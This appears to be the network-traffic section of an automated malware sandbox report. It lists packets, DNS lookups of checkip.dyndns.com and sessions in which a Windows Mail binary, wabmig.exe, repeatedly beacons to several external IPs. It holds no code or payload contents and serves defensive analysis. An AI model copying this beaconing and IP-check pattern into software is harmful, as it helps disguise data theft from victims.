Sep 25, 2024 16:01:28.426203966 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:28.630296946 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:28.683635950 CEST | 49711 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:29.279510021 CEST | 49713 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:29.279556036 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:29.279748917 CEST | 49713 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:29.293921947 CEST | 49713 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:29.293941975 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:29.782042980 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:29.782131910 CEST | 49713 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:29.788362980 CEST | 49713 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:29.788393021 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:29.788840055 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:29.839890003 CEST | 49713 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:29.843058109 CEST | 49713 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:29.887413979 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:30.109656096 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:30.109759092 CEST | 443 | 49713 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:30.109807014 CEST | 49713 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:30.114414930 CEST | 49713 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:30.134605885 CEST | 49711 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:30.139451981 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:30.343353987 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:30.346256018 CEST | 49715 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:30.346323013 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:30.346398115 CEST | 49715 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:30.346716881 CEST | 49715 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:30.346739054 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:30.386761904 CEST | 49711 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:30.823992968 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:30.833246946 CEST | 49715 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:30.833276987 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:30.954104900 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:30.954199076 CEST | 443 | 49715 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:30.954253912 CEST | 49715 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:30.954719067 CEST | 49715 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:30.957942963 CEST | 49711 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:30.959353924 CEST | 49716 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:30.963031054 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:30.963124037 CEST | 49711 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:30.964257002 CEST | 80 | 49716 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:30.964327097 CEST | 49716 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:30.964415073 CEST | 49716 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:30.969189882 CEST | 80 | 49716 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:31.637789011 CEST | 80 | 49716 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:31.639033079 CEST | 49717 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:31.639162064 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:31.639300108 CEST | 49717 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:31.639549017 CEST | 49717 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:31.639588118 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:31.683648109 CEST | 49716 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:32.099658012 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:32.107424021 CEST | 49717 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:32.107462883 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:32.251331091 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:32.251466990 CEST | 443 | 49717 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:32.251550913 CEST | 49717 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:32.252095938 CEST | 49717 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:32.256432056 CEST | 49718 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:32.261246920 CEST | 80 | 49718 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:32.264889956 CEST | 49718 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:32.265062094 CEST | 49718 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:32.269942999 CEST | 80 | 49718 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:32.957473040 CEST | 80 | 49718 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:32.958802938 CEST | 49719 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:32.958851099 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:32.958930016 CEST | 49719 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:32.959178925 CEST | 49719 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:32.959194899 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:33.011774063 CEST | 49718 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:33.416737080 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:33.418996096 CEST | 49719 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:33.419008970 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:33.557709932 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:33.557837009 CEST | 443 | 49719 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:33.557892084 CEST | 49719 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:33.558301926 CEST | 49719 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:33.564223051 CEST | 49718 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:33.565290928 CEST | 49720 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:33.570285082 CEST | 80 | 49720 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:33.570297956 CEST | 80 | 49718 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:33.570342064 CEST | 49720 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:33.570394993 CEST | 49718 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:33.570441961 CEST | 49720 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:33.575957060 CEST | 80 | 49720 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:34.244263887 CEST | 80 | 49720 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:34.245503902 CEST | 49721 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:34.245537996 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:34.245600939 CEST | 49721 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:34.245846033 CEST | 49721 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:34.245861053 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:34.402401924 CEST | 49720 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:34.706890106 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:34.708379030 CEST | 49721 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:34.708401918 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:34.877008915 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:34.877099991 CEST | 443 | 49721 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:34.877187014 CEST | 49721 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:34.877861023 CEST | 49721 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:34.880836010 CEST | 49720 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:34.881962061 CEST | 49722 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:34.887064934 CEST | 80 | 49720 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:34.887145042 CEST | 49720 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:34.887525082 CEST | 80 | 49722 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:34.887593985 CEST | 49722 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:34.887885094 CEST | 49722 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:34.894929886 CEST | 80 | 49722 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:35.553495884 CEST | 80 | 49722 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:35.554966927 CEST | 49723 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:35.555003881 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:35.555075884 CEST | 49723 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:35.555381060 CEST | 49723 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:35.555402994 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:35.605612993 CEST | 49722 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:36.035864115 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:36.037668943 CEST | 49723 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:36.037693977 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:36.173316002 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:36.173424006 CEST | 443 | 49723 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:36.173505068 CEST | 49723 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:36.177107096 CEST | 49723 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:36.180850983 CEST | 49722 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:36.181535006 CEST | 49724 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:36.185939074 CEST | 80 | 49722 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:36.186176062 CEST | 49722 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:36.186693907 CEST | 80 | 49724 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:36.186767101 CEST | 49724 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:36.186857939 CEST | 49724 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:36.191709995 CEST | 80 | 49724 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:37.094461918 CEST | 80 | 49724 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:37.095856905 CEST | 80 | 49724 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:37.095912933 CEST | 49724 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:37.096118927 CEST | 49725 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:37.096163034 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:37.096229076 CEST | 49725 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:37.096482038 CEST | 49725 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:37.096496105 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:37.554128885 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:37.555718899 CEST | 49725 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:37.555763006 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:37.705404997 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:37.705523968 CEST | 443 | 49725 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:37.705578089 CEST | 49725 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:37.706034899 CEST | 49725 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:37.709260941 CEST | 49724 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:37.710505962 CEST | 49726 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:37.714448929 CEST | 80 | 49724 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:37.714524031 CEST | 49724 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:37.716427088 CEST | 80 | 49726 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:37.716640949 CEST | 49726 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:37.716640949 CEST | 49726 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:37.721504927 CEST | 80 | 49726 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:38.425971031 CEST | 80 | 49726 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:38.427208900 CEST | 49727 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:38.427257061 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:38.427508116 CEST | 49727 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:38.427804947 CEST | 49727 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:38.427819014 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:38.480587959 CEST | 49726 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:38.886761904 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:38.892153978 CEST | 49727 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:38.892169952 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:39.227324009 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:39.227447033 CEST | 443 | 49727 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:39.227511883 CEST | 49727 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:39.227922916 CEST | 49727 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:39.231475115 CEST | 49726 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:39.232079983 CEST | 49728 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:39.236514091 CEST | 80 | 49726 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:39.236625910 CEST | 49726 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:39.236866951 CEST | 80 | 49728 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:39.236928940 CEST | 49728 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:39.236999989 CEST | 49728 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:39.241713047 CEST | 80 | 49728 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:39.903758049 CEST | 80 | 49728 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:39.905082941 CEST | 49729 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:39.905128002 CEST | 443 | 49729 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:39.905217886 CEST | 49729 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:39.905473948 CEST | 49729 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:39.905487061 CEST | 443 | 49729 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:39.949405909 CEST | 49728 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:40.382255077 CEST | 443 | 49729 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:40.383868933 CEST | 49729 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:40.383893013 CEST | 443 | 49729 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:40.530066967 CEST | 443 | 49729 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:40.530164003 CEST | 443 | 49729 | 188.114.97.3 | 192.168.2.8 |
Sep 25, 2024 16:01:40.530216932 CEST | 49729 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:40.530718088 CEST | 49729 | 443 | 192.168.2.8 | 188.114.97.3 |
Sep 25, 2024 16:01:40.563062906 CEST | 49728 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:40.787496090 CEST | 80 | 49728 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:40.787563086 CEST | 49728 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:40.789716005 CEST | 49730 | 443 | 192.168.2.8 | 149.154.167.220 |
Sep 25, 2024 16:01:40.789766073 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.8 |
Sep 25, 2024 16:01:40.789828062 CEST | 49730 | 443 | 192.168.2.8 | 149.154.167.220 |
Sep 25, 2024 16:01:40.790307045 CEST | 49730 | 443 | 192.168.2.8 | 149.154.167.220 |
Sep 25, 2024 16:01:40.790323019 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.8 |
Sep 25, 2024 16:01:41.563427925 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.8 |
Sep 25, 2024 16:01:41.563509941 CEST | 49730 | 443 | 192.168.2.8 | 149.154.167.220 |
Sep 25, 2024 16:01:41.567497969 CEST | 49730 | 443 | 192.168.2.8 | 149.154.167.220 |
Sep 25, 2024 16:01:41.567507982 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.8 |
Sep 25, 2024 16:01:41.567790985 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.8 |
Sep 25, 2024 16:01:41.570779085 CEST | 49730 | 443 | 192.168.2.8 | 149.154.167.220 |
Sep 25, 2024 16:01:41.615411997 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.8 |
Sep 25, 2024 16:01:41.825213909 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.8 |
Sep 25, 2024 16:01:41.825290918 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.8 |
Sep 25, 2024 16:01:41.825366020 CEST | 49730 | 443 | 192.168.2.8 | 149.154.167.220 |
Sep 25, 2024 16:01:41.873963118 CEST | 49730 | 443 | 192.168.2.8 | 149.154.167.220 |
Sep 25, 2024 16:01:57.212063074 CEST | 49716 | 80 | 192.168.2.8 | 132.226.247.73 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 25, 2024 16:01:27.711285114 CEST | 57631 | 53 | 192.168.2.8 | 1.1.1.1 |
Sep 25, 2024 16:01:27.718611002 CEST | 53 | 57631 | 1.1.1.1 | 192.168.2.8 |
Sep 25, 2024 16:01:29.267692089 CEST | 49174 | 53 | 192.168.2.8 | 1.1.1.1 |
Sep 25, 2024 16:01:29.278820992 CEST | 53 | 49174 | 1.1.1.1 | 192.168.2.8 |
Sep 25, 2024 16:01:40.563646078 CEST | 54603 | 53 | 192.168.2.8 | 1.1.1.1 |
Sep 25, 2024 16:01:40.788978100 CEST | 53 | 54603 | 1.1.1.1 | 192.168.2.8 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Sep 25, 2024 16:01:27.711285114 CEST | 192.168.2.8 | 1.1.1.1 | 0xffc4 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 25, 2024 16:01:29.267692089 CEST | 192.168.2.8 | 1.1.1.1 | 0x9f1c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 25, 2024 16:01:40.563646078 CEST | 192.168.2.8 | 1.1.1.1 | 0x6d3d | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | checkip.dyndns.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | 132.226.247.73 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | 158.101.44.242 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | 132.226.8.169 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | 193.122.6.168 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 16:01:27.718611002 CEST | 1.1.1.1 | 192.168.2.8 | 0xffc4 | No error (0) | 193.122.130.0 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 16:01:29.278820992 CEST | 1.1.1.1 | 192.168.2.8 | 0x9f1c | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 16:01:29.278820992 CEST | 1.1.1.1 | 192.168.2.8 | 0x9f1c | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
Sep 25, 2024 16:01:40.788978100 CEST | 1.1.1.1 | 192.168.2.8 | 0x6d3d | No error (0) | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.8 | 49710 | 185.29.11.53 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 16:01:26.363347054 CEST | 171 | OUT | |
Sep 25, 2024 16:01:26.987665892 CEST | 1236 | IN | |
Sep 25, 2024 16:01:26.987684011 CEST | 224 | IN | |
Sep 25, 2024 16:01:26.987695932 CEST | 1236 | IN | |
Sep 25, 2024 16:01:26.987709999 CEST | 1236 | IN | |
Sep 25, 2024 16:01:26.987735987 CEST | 448 | IN | |
Sep 25, 2024 16:01:26.987749100 CEST | 1236 | IN | |
Sep 25, 2024 16:01:26.987760067 CEST | 224 | IN | |
Sep 25, 2024 16:01:27.068506002 CEST | 1236 | IN | |
Sep 25, 2024 16:01:27.068525076 CEST | 1236 | IN | |
Sep 25, 2024 16:01:27.068536997 CEST | 1236 | IN | |
Sep 25, 2024 16:01:27.068550110 CEST | 1236 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.8 | 49711 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 16:01:27.731781960 CEST | 151 | OUT | |
Sep 25, 2024 16:01:28.417197943 CEST | 320 | IN | |
Sep 25, 2024 16:01:28.421348095 CEST | 127 | OUT | |
Sep 25, 2024 16:01:28.630296946 CEST | 320 | IN | |
Sep 25, 2024 16:01:30.134605885 CEST | 127 | OUT | |
Sep 25, 2024 16:01:30.343353987 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.8 | 49716 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 16:01:30.964415073 CEST | 127 | OUT | |
Sep 25, 2024 16:01:31.637789011 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.8 | 49718 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 16:01:32.265062094 CEST | 151 | OUT | |
Sep 25, 2024 16:01:32.957473040 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.8 | 49720 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 16:01:33.570441961 CEST | 151 | OUT | |
Sep 25, 2024 16:01:34.244263887 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.8 | 49722 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 16:01:34.887885094 CEST | 151 | OUT | |
Sep 25, 2024 16:01:35.553495884 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.8 | 49724 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 16:01:36.186857939 CEST | 151 | OUT | |
Sep 25, 2024 16:01:37.094461918 CEST | 320 | IN | |
Sep 25, 2024 16:01:37.095856905 CEST | 320 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.8 | 49726 | 132.226.247.73 | 80 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Sep 25, 2024 16:01:37.716640949 CEST | 151 | OUT | |
Sep 25, 2024 16:01:38.425971031 CEST | 320 | IN |
